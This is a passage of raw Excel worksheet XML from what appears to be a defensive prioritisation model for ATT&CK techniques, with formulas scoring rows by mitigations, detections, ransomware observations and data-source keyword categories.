        <v>265</v>
      </c>
      <c r="AE64" s="37" t="str" cm="1">
        <f t="array" ref="AE64">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD64)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF64" s="37">
        <v>60</v>
      </c>
      <c r="AG64" s="37" t="str" cm="1">
        <f t="array" ref="AG64">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD64)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH64" s="37">
        <v>60</v>
      </c>
      <c r="AI64" s="37" t="str" cm="1">
        <f t="array" ref="AI64">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD64)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ64" s="37">
        <v>60</v>
      </c>
      <c r="AK64" s="37" t="str" cm="1">
        <f t="array" ref="AK64">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD64)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL64" s="37">
        <v>60</v>
      </c>
      <c r="AM64" s="37" t="str" cm="1">
        <f t="array" ref="AM64">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD64)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN64" s="37">
        <v>0</v>
      </c>
      <c r="AO64" s="37">
        <v>2</v>
      </c>
      <c r="AP64" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ64" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.1809523809523821</v>
      </c>
      <c r="AR64" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS64" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT64" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU6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0.48480725623582765</v>
      </c>
    </row>
    <row r="65" spans="1:47" ht="34">
      <c r="A65" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.5</v>
      </c>
      <c r="B65" s="37">
        <f t="shared" si="0"/>
        <v>82.833391666666671</v>
      </c>
      <c r="C65" s="37" t="s">
        <v>266</v>
      </c>
      <c r="D65" s="50" t="s">
        <v>248</v>
      </c>
      <c r="E65" s="37" t="s">
        <v>267</v>
      </c>
      <c r="F65" s="37">
        <v>1</v>
      </c>
      <c r="G65" s="37">
        <v>1</v>
      </c>
      <c r="H65" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I65" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J65" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K65" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L65" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M65" s="37">
        <v>0</v>
      </c>
      <c r="N65" s="56">
        <v>1</v>
      </c>
      <c r="O65" s="56">
        <v>9</v>
      </c>
      <c r="P65" s="56">
        <v>1</v>
      </c>
      <c r="Q65" s="56">
        <v>1</v>
      </c>
      <c r="R65" s="57" t="s">
        <v>249</v>
      </c>
      <c r="S65" s="57">
        <v>7</v>
      </c>
      <c r="T65" s="57" t="s">
        <v>250</v>
      </c>
      <c r="U65" s="57">
        <v>12</v>
      </c>
      <c r="V65" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.23809547619047619</v>
      </c>
      <c r="W65" s="37">
        <v>19</v>
      </c>
      <c r="X65" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Y65" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Z65" s="37">
        <v>12</v>
      </c>
      <c r="AA65" s="37">
        <v>0.12</v>
      </c>
      <c r="AB65" s="37">
        <v>0.12</v>
      </c>
      <c r="AC65" s="37"/>
      <c r="AD65" s="50" t="s">
        <v>268</v>
      </c>
      <c r="AE65" s="37" t="str" cm="1">
        <f t="array" ref="AE65">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD65)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF65" s="37">
        <v>61</v>
      </c>
      <c r="AG65" s="37" t="str" cm="1">
        <f t="array" ref="AG65">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD65)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH65" s="37">
        <v>61</v>
      </c>
      <c r="AI65" s="37" t="str" cm="1">
        <f t="array" ref="AI65">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD65)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ65" s="37">
        <v>61</v>
      </c>
      <c r="AK65" s="37" t="str" cm="1">
        <f t="array" ref="AK65">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD65)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL65" s="37">
        <v>61</v>
      </c>
      <c r="AM65" s="37" t="str" cm="1">
        <f t="array" ref="AM65">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD65)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN65" s="37">
        <v>0</v>
      </c>
      <c r="AO65" s="37">
        <v>6</v>
      </c>
      <c r="AP65" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.5</v>
      </c>
      <c r="AQ65" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>27.611130555555558</v>
      </c>
      <c r="AR65" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS65" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AT65" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AU6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4.0873043650793646</v>
      </c>
    </row>
    <row r="66" spans="1:47" ht="17">
      <c r="A66" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B66" s="37">
        <f t="shared" si="0"/>
        <v>27.271428571428572</v>
      </c>
      <c r="C66" s="37" t="s">
        <v>269</v>
      </c>
      <c r="D66" s="50" t="s">
        <v>248</v>
      </c>
      <c r="E66" s="37" t="s">
        <v>270</v>
      </c>
      <c r="F66" s="37">
        <v>1</v>
      </c>
      <c r="G66" s="37">
        <v>1</v>
      </c>
      <c r="H66" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I66" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J66" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K66" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L66" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M66" s="37">
        <v>0</v>
      </c>
      <c r="N66" s="56">
        <v>0</v>
      </c>
      <c r="O66" s="56">
        <v>1</v>
      </c>
      <c r="P66" s="56">
        <v>1</v>
      </c>
      <c r="Q66" s="56">
        <v>0</v>
      </c>
      <c r="R66" s="57"/>
      <c r="S66" s="57">
        <v>0</v>
      </c>
      <c r="T66" s="57"/>
      <c r="U66" s="57">
        <v>0</v>
      </c>
      <c r="V66" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095229E-3</v>
      </c>
      <c r="W66" s="37">
        <v>0</v>
      </c>
      <c r="X66" s="37">
        <v>0</v>
      </c>
      <c r="Y66" s="37">
        <v>0</v>
      </c>
      <c r="Z66" s="37">
        <v>2</v>
      </c>
      <c r="AA66" s="37">
        <v>0.02</v>
      </c>
      <c r="AB66" s="37">
        <v>0.02</v>
      </c>
      <c r="AC66" s="37"/>
      <c r="AD66" s="50" t="s">
        <v>218</v>
      </c>
      <c r="AE66" s="37" t="str" cm="1">
        <f t="array" ref="AE66">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD66)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF66" s="37">
        <v>62</v>
      </c>
      <c r="AG66" s="37" t="str" cm="1">
        <f t="array" ref="AG66">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD66)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH66" s="37">
        <v>62</v>
      </c>
      <c r="AI66" s="37" t="str" cm="1">
        <f t="array" ref="AI66">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD66)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ66" s="37">
        <v>62</v>
      </c>
      <c r="AK66" s="37" t="str" cm="1">
        <f t="array" ref="AK66">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD66)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL66" s="37">
        <v>62</v>
      </c>
      <c r="AM66" s="37" t="str" cm="1">
        <f t="array" ref="AM66">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD66)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN66" s="37">
        <v>0</v>
      </c>
      <c r="AO66" s="37">
        <v>0</v>
      </c>
      <c r="AP66" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ66" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.0904761904761902</v>
      </c>
      <c r="AR66" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS66" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT66" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU6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7" spans="1:47" ht="17">
      <c r="A67" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B67" s="37">
        <f t="shared" si="0"/>
        <v>43.371440619047618</v>
      </c>
      <c r="C67" s="37" t="s">
        <v>271</v>
      </c>
      <c r="D67" s="50" t="s">
        <v>248</v>
      </c>
      <c r="E67" s="37" t="s">
        <v>272</v>
      </c>
      <c r="F67" s="37">
        <v>1</v>
      </c>
      <c r="G67" s="37">
        <v>1</v>
      </c>
      <c r="H67" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I67" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J67" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K67" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L67" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M67" s="37">
        <v>0</v>
      </c>
      <c r="N67" s="56">
        <v>0</v>
      </c>
      <c r="O67" s="56">
        <v>2</v>
      </c>
      <c r="P67" s="56">
        <v>1</v>
      </c>
      <c r="Q67" s="56">
        <v>0</v>
      </c>
      <c r="R67" s="57"/>
      <c r="S67" s="57">
        <v>0</v>
      </c>
      <c r="T67" s="57" t="s">
        <v>273</v>
      </c>
      <c r="U67" s="57">
        <v>6</v>
      </c>
      <c r="V67" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>7.1428619047619046E-2</v>
      </c>
      <c r="W67" s="37">
        <v>6</v>
      </c>
      <c r="X67" s="37">
        <v>0.10909099999999999</v>
      </c>
      <c r="Y67" s="37">
        <v>0.10909099999999999</v>
      </c>
      <c r="Z67" s="37">
        <v>3</v>
      </c>
      <c r="AA67" s="37">
        <v>0.03</v>
      </c>
      <c r="AB67" s="37">
        <v>0.03</v>
      </c>
      <c r="AC67" s="37"/>
      <c r="AD67" s="50" t="s">
        <v>238</v>
      </c>
      <c r="AE67" s="37" t="str" cm="1">
        <f t="array" ref="AE67">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD67)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF67" s="37">
        <v>63</v>
      </c>
      <c r="AG67" s="37" t="str" cm="1">
        <f t="array" ref="AG67">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD67)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH67" s="37">
        <v>63</v>
      </c>
      <c r="AI67" s="37" t="str" cm="1">
        <f t="array" ref="AI67">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD67)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ67" s="37">
        <v>63</v>
      </c>
      <c r="AK67" s="37" t="str" cm="1">
        <f t="array" ref="AK67">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD67)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL67" s="37">
        <v>63</v>
      </c>
      <c r="AM67" s="37" t="str" cm="1">
        <f t="array" ref="AM67">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD67)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN67" s="37">
        <v>0</v>
      </c>
      <c r="AO67" s="37"/>
      <c r="AP67" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ67" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>14.457146873015873</v>
      </c>
      <c r="AR67" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS67" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT67" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU6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8" spans="1:47" ht="17">
      <c r="A68" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B68" s="37">
        <f t="shared" si="0"/>
        <v>25.700000000000003</v>
      </c>
      <c r="C68" s="37" t="s">
        <v>3781</v>
      </c>
      <c r="D68" s="50" t="s">
        <v>248</v>
      </c>
      <c r="E68" s="37" t="s">
        <v>3782</v>
      </c>
      <c r="F68" s="37">
        <v>1</v>
      </c>
      <c r="G68" s="37">
        <v>1</v>
      </c>
      <c r="H68" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I68" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J68" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K68" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L68" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M68" s="37">
        <v>0</v>
      </c>
      <c r="N68" s="56">
        <v>0</v>
      </c>
      <c r="O68" s="56">
        <v>0</v>
      </c>
      <c r="P68" s="56">
        <v>0</v>
      </c>
      <c r="Q68" s="56">
        <v>0</v>
      </c>
      <c r="R68" s="57"/>
      <c r="S68" s="57"/>
      <c r="T68" s="57"/>
      <c r="U68" s="57"/>
      <c r="V68" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W68" s="37"/>
      <c r="X68" s="37"/>
      <c r="Y68" s="37"/>
      <c r="Z68" s="37"/>
      <c r="AA68" s="37"/>
      <c r="AB68" s="37"/>
      <c r="AC68" s="37"/>
      <c r="AD68" s="50" t="s">
        <v>3783</v>
      </c>
      <c r="AE68" s="37" t="str" cm="1">
        <f t="array" ref="AE68">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD68)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF68" s="37">
        <v>64</v>
      </c>
      <c r="AG68" s="37" t="str" cm="1">
        <f t="array" ref="AG68">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD68)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH68" s="37">
        <v>64</v>
      </c>
      <c r="AI68" s="37" t="str" cm="1">
        <f t="array" ref="AI68">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD68)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ68" s="37">
        <v>64</v>
      </c>
      <c r="AK68" s="37" t="str" cm="1">
        <f t="array" ref="AK68">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD68)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL68" s="37">
        <v>64</v>
      </c>
      <c r="AM68" s="37" t="str" cm="1">
        <f t="array" ref="AM68">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD68)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN68" s="37"/>
      <c r="AO68" s="37"/>
      <c r="AP68" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ68" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>8.5666666666666682</v>
      </c>
      <c r="AR68" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS68" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT68" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU6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9" spans="1:47" ht="17">
      <c r="A69" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B69" s="37">
        <f t="shared" ref="B69:B132" si="1">SUM(H69,M69,V69)*(1+SUM(AF69,AH69,AJ69,AL69,AN69))</f>
        <v>26.1</v>
      </c>
      <c r="C69" s="37" t="s">
        <v>3784</v>
      </c>
      <c r="D69" s="50" t="s">
        <v>248</v>
      </c>
      <c r="E69" s="37" t="s">
        <v>3785</v>
      </c>
      <c r="F69" s="37">
        <v>1</v>
      </c>
      <c r="G69" s="37">
        <v>1</v>
      </c>
      <c r="H69" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I69" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J69" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K69" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L69" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M69" s="37">
        <v>0</v>
      </c>
      <c r="N69" s="56">
        <v>0</v>
      </c>
      <c r="O69" s="56">
        <v>0</v>
      </c>
      <c r="P69" s="56">
        <v>0</v>
      </c>
      <c r="Q69" s="56">
        <v>0</v>
      </c>
      <c r="R69" s="57"/>
      <c r="S69" s="57"/>
      <c r="T69" s="57"/>
      <c r="U69" s="57"/>
      <c r="V69" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W69" s="37"/>
      <c r="X69" s="37"/>
      <c r="Y69" s="37"/>
      <c r="Z69" s="37"/>
      <c r="AA69" s="37"/>
      <c r="AB69" s="37"/>
      <c r="AC69" s="37"/>
      <c r="AD69" s="50" t="s">
        <v>1347</v>
      </c>
      <c r="AE69" s="37" t="str" cm="1">
        <f t="array" ref="AE69">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD69)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF69" s="37">
        <v>65</v>
      </c>
      <c r="AG69" s="37" t="str" cm="1">
        <f t="array" ref="AG69">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD69)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH69" s="37">
        <v>65</v>
      </c>
      <c r="AI69" s="37" t="str" cm="1">
        <f t="array" ref="AI69">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD69)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ69" s="37">
        <v>65</v>
      </c>
      <c r="AK69" s="37" t="str" cm="1">
        <f t="array" ref="AK69">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD69)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL69" s="37">
        <v>65</v>
      </c>
      <c r="AM69" s="37" t="str" cm="1">
        <f t="array" ref="AM69">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD69)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN69" s="37"/>
      <c r="AO69" s="37"/>
      <c r="AP69" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ69" s="37">
